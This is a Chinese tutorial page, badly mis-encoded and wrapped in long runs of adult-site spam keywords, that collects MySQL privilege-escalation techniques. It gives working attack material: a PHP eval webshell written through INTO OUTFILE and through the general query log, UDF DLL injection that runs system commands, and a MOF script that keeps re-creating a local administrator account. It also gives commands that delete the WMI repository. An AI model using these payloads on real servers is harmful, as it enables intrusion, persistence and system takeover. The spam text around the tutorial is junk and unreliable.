婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁(yè) > 知識(shí)庫(kù) > Mysql提權(quán)的多種姿勢(shì)匯總

Mysql提權(quán)的多種姿勢(shì)匯總

熱門標(biāo)簽:大眾點(diǎn)評(píng)星級(jí)酒店地圖標(biāo)注 高清地圖標(biāo)注道路 話務(wù)外呼系統(tǒng)怎么樣 外東北地圖標(biāo)注 臨清電話機(jī)器人 400電話可以辦理嗎 拉卡拉外呼系統(tǒng) 云南電商智能外呼系統(tǒng)價(jià)格 智能外呼系統(tǒng)復(fù)位

一、寫(xiě)入Webshell

into outfile 寫(xiě)shell

前提條件:

1、知道網(wǎng)站物理路徑

2、高權(quán)限數(shù)據(jù)庫(kù)用戶

3、load_file() 開(kāi)啟 即 secure_file_priv 無(wú)限制

4、網(wǎng)站路徑有寫(xiě)入權(quán)限

首先基礎(chǔ)語(yǔ)法查詢是否 secure_file_priv 沒(méi)有限制

show global variables like '%secure_file_priv%';

value 說(shuō)明
NULL 不允許導(dǎo)入或?qū)С?/td>
/var 只允許在/var目錄導(dǎo)入導(dǎo)出
不限制目錄

在 MySQL 5.5 之前 secure_file_priv 默認(rèn)是空,這個(gè)情況下可以向任意絕對(duì)路徑寫(xiě)文件

在 MySQL 5.5之后 secure_file_priv 默認(rèn)是 NULL,這個(gè)情況下不可以寫(xiě)文件

如果滿足上述所有條件的話,那么可以嘗試使用下面的 SQL 語(yǔ)句來(lái)直接寫(xiě) shell:

select '?php @eval($_POST[cmd]); ?>' into outfile 'C:\\soft\\WWW\\empirecms\\shell.php';

查看目標(biāo)路徑下,已寫(xiě)入shell.php文件

上菜刀連接

日志文件寫(xiě)shell

前提條件:

1、Web 文件夾寬松權(quán)限可以寫(xiě)入

2、Windows 系統(tǒng)下

3、高權(quán)限運(yùn)行 MySQL 或者 Apache

MySQL 5.0 版本以上會(huì)創(chuàng)建日志文件,可以通過(guò)修改日志的全局變量來(lái) getshell

查看日志目錄

SHOW VARIABLES LIKE 'general%';

general_log 默認(rèn)關(guān)閉,開(kāi)啟它可以記錄用戶輸入的每條命令,會(huì)把其保存在對(duì)應(yīng)的日志文件中。
可以嘗試自定義日志文件,并向日志文件里面寫(xiě)入內(nèi)容的話,那么就可以成功 getshell:

更改日志文件位置

set global general_log = "ON";
set global general_log_file='C:\\soft\\WWW\\empirecms\\log.php';

查看當(dāng)前日志配置

目標(biāo)目錄下查看,寫(xiě)入了log.php文件

寫(xiě)入shell

select '?php @eval($_POST[cmd]); ?>'

上菜刀,連接


二、UDF提權(quán)

自定義函數(shù),是數(shù)據(jù)庫(kù)功能的一種擴(kuò)展。用戶通過(guò)自定義函數(shù)可以實(shí)現(xiàn)在 MySQL 中無(wú)法方便實(shí)現(xiàn)的功能,其添加的新函數(shù)都可以在SQL語(yǔ)句中調(diào)用,就像調(diào)用本機(jī)函數(shù) version() 等方便。

動(dòng)態(tài)鏈接庫(kù)

如果是 MySQL >= 5.1 的版本,必須把 UDF 的動(dòng)態(tài)鏈接庫(kù)文件放置于 MySQL 安裝目錄下的 lib\plugin 文件夾下文件夾下才能創(chuàng)建自定義函數(shù)。

那么動(dòng)態(tài)鏈接庫(kù)文件去哪里找呢?實(shí)際上我們常用的工具 sqlmap 和 Metasploit 里面都自帶了對(duì)應(yīng)系統(tǒng)的動(dòng)態(tài)鏈接庫(kù)文件。

sqlmap的UDF動(dòng)態(tài)鏈接庫(kù)文件位置

sqlmap根目錄/data/udf/mysql

不過(guò) sqlmap 中 自帶這些動(dòng)態(tài)鏈接庫(kù)為了防止被誤殺都經(jīng)過(guò)編碼處理過(guò),不能被直接使用。不過(guò)可以利用 sqlmap 自帶的解碼工具cloak.py 來(lái)解碼使用,cloak.py 的位置為:sqlmap根目錄/extra/cloak/cloak.py ,

解碼方法如下:

解碼32位的windows動(dòng)態(tài)鏈接庫(kù):

python3 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll

其他linux和windows動(dòng)態(tài)鏈接庫(kù)解碼類似

或者直接使用metasploit自帶的動(dòng)態(tài)鏈接庫(kù),無(wú)需解碼

Metasploit的UDF動(dòng)態(tài)鏈接庫(kù)文件位置

接下來(lái)的任務(wù)是把 UDF 的動(dòng)態(tài)鏈接庫(kù)文件放到 MySQL 的插件目錄下,這個(gè)目錄改如何去尋找呢?可以使用如下的 SQL 語(yǔ)句來(lái)查詢:

show variables like '%plugin%'


寫(xiě)入動(dòng)態(tài)鏈接庫(kù)

當(dāng) secure_file_priv 無(wú)限制的時(shí)候,我們可以手工寫(xiě)文件到 plugin 目錄下的

select load_file('C:\\soft\\UDFmysql\\lib_mysqludf_sys_32.dll')  into dumpfile 'C:\\soft\\MySQL\\lib\\plugin\\udf.dll';

c

創(chuàng)建自定義函數(shù)并調(diào)用命令

創(chuàng)建自定義函數(shù)

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

查看是否新增了sys_eval

接著就可以通過(guò)創(chuàng)建的這個(gè)函數(shù)來(lái)執(zhí)行系統(tǒng)命令了:

刪除自定義函數(shù)

drop function sys_eval;

三、MOF提權(quán)

mof提權(quán)原理

關(guān)于 mof 提權(quán)的原理其實(shí)很簡(jiǎn)單,就是利用了 c:/windows/system32/wbem/mof/ 目錄下的 nullevt.mof 文件,每分鐘都會(huì)在一個(gè)特定的時(shí)間去執(zhí)行一次的特性,來(lái)寫(xiě)入我們的cmd命令使其被帶入執(zhí)行。

嚴(yán)苛的前提條件:

1.windows 03及以下版本

2.mysql啟動(dòng)身份具有權(quán)限去讀寫(xiě)c:/windows/system32/wbem/mof目錄

3.secure-file-priv參數(shù)不為null

提權(quán)過(guò)程:

MOF文件每五秒就會(huì)執(zhí)行,而且是系統(tǒng)權(quán)限,我們通過(guò)mysql使用load_file 將文件寫(xiě)入/wbme/mof,然后系統(tǒng)每隔五秒就會(huì)執(zhí)行一次我們上傳的MOF。MOF當(dāng)中有一段是vbs腳本,我們可以通過(guò)控制這段vbs腳本的內(nèi)容讓系統(tǒng)執(zhí)行命令,進(jìn)行提權(quán)。

利用代碼如下(test.mof):

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hpdoger 123456 /add\")\nWSH.run(\"net.exe localgroup administrators hpdoger /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

MOF文件利用:

將上面的腳本上傳到有讀寫(xiě)權(quán)限的目錄下:

這里我上傳到了C:\soft\,我們使用sql語(yǔ)句將文件導(dǎo)入到c:/windows/system32/wbem/mof/下

select load_file("C:/soft/test.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"

驗(yàn)證提權(quán):

當(dāng)我們成功把mof導(dǎo)出時(shí),mof就會(huì)直接被執(zhí)行,且5秒創(chuàng)建一次用戶。

關(guān)于MOF提權(quán)弊端

我們提權(quán)成功后,就算被刪號(hào),mof也會(huì)在五秒內(nèi)將原賬號(hào)重建,那么這給我們退出測(cè)試造成了很大的困擾,所以謹(jǐn)慎使用。那么我們?nèi)绾蝿h掉我們的入侵賬號(hào)呢?

cmd 下運(yùn)行下面語(yǔ)句:

#停止winmgmt服務(wù)
net stop winmgmt

#刪除 Repository 文件夾
rmdir /s /q C:\Windows\system32\wbem\Repository\


# 手動(dòng)刪除 mof 文件
del c:/windows/system32/wbem/mof/nullevt.mof /F /S

# 刪除創(chuàng)建的用戶
net user hpdoger /delete

#重啟服務(wù)
net start winmgmt

總結(jié)

到此這篇關(guān)于Mysql提權(quán)姿勢(shì)的文章就介紹到這了,更多相關(guān)Mysql提權(quán)姿勢(shì)內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

您可能感興趣的文章:
  • Linux利用UDF庫(kù)實(shí)現(xiàn)Mysql提權(quán)
  • Mysql提權(quán)方法利用
  • 提權(quán),以MySQL之名

標(biāo)簽:山西 溫州 揚(yáng)州 三明 福州 阿里 無(wú)錫 定西

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《Mysql提權(quán)的多種姿勢(shì)匯總》,本文關(guān)鍵詞  Mysql,提權(quán),的,多種,姿勢(shì),;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《Mysql提權(quán)的多種姿勢(shì)匯總》相關(guān)的同類信息!
  • 本頁(yè)收集關(guān)于Mysql提權(quán)的多種姿勢(shì)匯總的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    精品精品国产高清一毛片一天堂| 亚洲欧美日韩国产一区二区三区 | 免费看日韩a级影片| 国产精品69毛片高清亚洲| 色综合中文字幕国产| 欧美一区二区三区系列电影| 亚洲欧洲国产日本综合| 国产一区二区三区精品欧美日韩一区二区三区 | 99久久精品免费看| 欧美不卡在线视频| 亚洲一区在线观看免费观看电影高清| 国产精品77777| 日韩欧美高清在线| 日韩精品午夜视频| 欧美性一级生活| 亚洲视频一区二区免费在线观看| 国产精品一区二区在线看| 日韩视频在线永久播放| 亚洲成在人线在线播放| 在线观看日韩国产| 亚洲精品欧美综合四区| aa级大片欧美| 亚洲欧洲成人av每日更新| 成年人国产精品| 中文字幕欧美三区| 丁香五精品蜜臀久久久久99网站 | 91在线观看美女| 欧美激情资源网| 国产成人免费在线视频| 久久久久久久国产精品影院| 狠狠色综合播放一区二区| 久久这里只有精品视频网| 日本欧美在线观看| 日韩精品在线一区| 精品一区二区日韩| 久久九九全国免费| 成人h动漫精品| 一区二区成人在线| 欧美日韩aaaaa| 日韩成人一级大片| 精品国产乱码久久| 国产成人av电影| 亚洲婷婷综合色高清在线| 91片黄在线观看| 亚洲国产精品久久久久婷婷884| 欧美视频中文字幕| 久久精工是国产品牌吗| 日本一区二区免费在线观看视频 | 亚洲视频综合在线| 欧美日韩国产影片| 伦理电影国产精品| 中文字幕精品一区二区精品绿巨人 | 91精品国产色综合久久不卡电影| 日韩国产精品久久久久久亚洲| 欧美刺激午夜性久久久久久久 | 在线精品视频免费播放| 天天色天天爱天天射综合| 日韩欧美亚洲国产另类| 国产成人鲁色资源国产91色综| 亚洲国产精品av| 欧美最新大片在线看| 蜜臀av在线播放一区二区三区| 国产三级久久久| 欧美午夜片在线观看| 久久国产精品一区二区| 国产人成一区二区三区影院| 色综合天天做天天爱| 日本三级亚洲精品| 中文字幕一区二区三区四区不卡 | 亚洲欧美日韩国产一区二区三区| 欧美老女人第四色| 99久久夜色精品国产网站| 日韩精品91亚洲二区在线观看| 久久精品一级爱片| 91精品久久久久久久久99蜜臂| 国产乱子轮精品视频| 日韩精品一二三| 亚洲色大成网站www久久九九| 日韩视频免费观看高清在线视频| 成人av网址在线观看| 久久99精品国产91久久来源| 亚洲美女屁股眼交3| 中文字幕免费在线观看视频一区| 91精品国产入口| 91久久精品一区二区二区| 国产乱淫av一区二区三区| 亚洲福利视频一区| 亚洲欧美一区二区久久 | 免费成人性网站| 亚洲精品水蜜桃| 国产精品私人影院| 精品欧美乱码久久久久久| 欧美日韩不卡一区二区| 91国偷自产一区二区三区观看| 国产精品综合一区二区| 蜜臀久久99精品久久久画质超高清| 亚洲天天做日日做天天谢日日欢| 国产欧美一区二区精品婷婷| 欧美电影精品一区二区| 日韩一区二区三区精品视频| 欧美性大战久久久久久久| 91丨国产丨九色丨pron| thepron国产精品| 99热精品国产| www..com久久爱| av激情成人网| 色哟哟一区二区| 色综合av在线| 91视视频在线观看入口直接观看www | 97久久精品人人澡人人爽| 成人av网址在线观看| 国产91精品精华液一区二区三区 | 暴力调教一区二区三区| caoporen国产精品视频| www.亚洲人| 色综合久久九月婷婷色综合| 一本大道久久精品懂色aⅴ| 91在线你懂得| 欧美伊人久久大香线蕉综合69| 在线免费视频一区二区| 欧美伊人久久久久久午夜久久久久| 欧美性猛交xxxxxxxx| 欧美一级高清片在线观看| www国产亚洲精品久久麻豆| 国产喷白浆一区二区三区| 国产精品理论片在线观看| 国产精品亲子乱子伦xxxx裸| 亚洲黄网站在线观看| 亚洲一区二区三区视频在线播放| 三级在线观看一区二区| 国模少妇一区二区三区| 国产91清纯白嫩初高中在线观看| 99久久伊人精品| 884aa四虎影成人精品一区| 精品少妇一区二区三区在线视频| 欧美激情综合在线| 亚洲第一会所有码转帖| 激情综合五月天| 97超碰欧美中文字幕| 51精品视频一区二区三区| 久久精品网站免费观看| 亚洲一二三级电影| 国产乱码精品一区二区三| 欧美中文字幕一区| 337p日本欧洲亚洲大胆精品 | 亚洲午夜三级在线| 韩国理伦片一区二区三区在线播放| 国产成人精品一区二| 欧美吞精做爰啪啪高潮| 久久亚洲一区二区三区明星换脸| 亚洲色图视频网| 久久99日本精品| 在线免费观看日韩欧美| 久久亚洲精品国产精品紫薇| 亚洲精品国产精品乱码不99| 美女www一区二区| 日本电影欧美片| 国产欧美精品在线观看| 天天影视网天天综合色在线播放| 7777精品久久久大香线蕉 | 欧美成人a∨高清免费观看| 亚洲欧美色综合| 国产成人精品影视| 日韩欧美亚洲另类制服综合在线| 亚洲精品国产一区二区精华液| 国产丶欧美丶日本不卡视频| 欧美一二三区在线观看| 一级中文字幕一区二区| 成av人片一区二区| 久久久久久免费| 久久99日本精品| 欧美精品99久久久**| 一区二区三区中文免费| k8久久久一区二区三区| 欧美激情艳妇裸体舞| 韩国v欧美v亚洲v日本v| 欧美一卡2卡三卡4卡5免费| 亚洲一区二区三区中文字幕在线| fc2成人免费人成在线观看播放| 久久久精品国产免大香伊 | 国产精品人人做人人爽人人添| 免费在线看一区| 欧美日高清视频| 亚洲r级在线视频| 欧美日韩一区二区三区不卡 | 一区在线观看视频| 国产一区二区按摩在线观看| 日韩欧美国产午夜精品| 亚洲高清不卡在线| 欧美色图在线观看| 亚洲一区二区三区四区不卡| 91九色最新地址| 亚洲免费视频成人| 一本大道av一区二区在线播放| 中文字幕一区二区三区不卡| 风间由美一区二区av101| 国产免费观看久久| 成人国产在线观看| 亚洲欧洲成人自拍| 色吊一区二区三区|